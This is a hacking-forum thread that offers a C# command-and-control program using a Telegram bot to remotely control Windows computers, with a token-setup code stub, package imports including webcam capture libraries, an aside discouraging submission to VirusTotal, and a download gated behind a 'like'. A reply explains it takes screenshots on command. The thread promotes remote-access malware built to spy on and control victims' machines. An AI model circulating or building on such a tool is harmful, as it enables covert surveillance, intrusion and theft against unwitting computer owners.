• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Telegram Csharp C2

Status
Not open for further replies.

0x1

LeVeL23 HacKerS TeaM
User
Joined
Nov 15, 2013
Messages
880
Reputation
0
Reaction score
6,315
Points
243
Credits
78
‎11 Years of Service‎
18%
cJqTit1.png

Command and Control for C# Writing

Author: Leiothrix

VirusTotal check result

Don't pass it on to Virus Total anymore. He tried for you.

73StR9u.png

Install

Nuget download these package

using System.IO;
using Telegram.Bot;
using Telegram.Bot.Args;
using Telegram.Bot.Types.InputFiles;
using AForge.Video;
using AForge.Controls;
using AForge.Video.DirectShow;


Add related classes in 'References'

System.Drawing;
System.Windows.Forms;

How to used

qkdvczo.png


Modify your Token to the program

Code:
 static void Main(){
            botClient = new TelegramBotClient("token");		//Your Token
            botClient.OnMessage += Bot_OnMessage;
            botClient.StartReceiving();
            Thread.Sleep(int.MaxValue);
}
More info & Download

To see this hidden content, you must like this content.
 
Hi!

Can you explain me. What does it do?

 
Hi!

Can you explain me. What does it do? 
aciderHi, This for use Telegram as server to control a windows system with C#

You control Windows OS with sending Telegram Message (with API TOKEN) , exemple : /getscr (to get Screen Picture)

 
Status
Not open for further replies.
Back
Top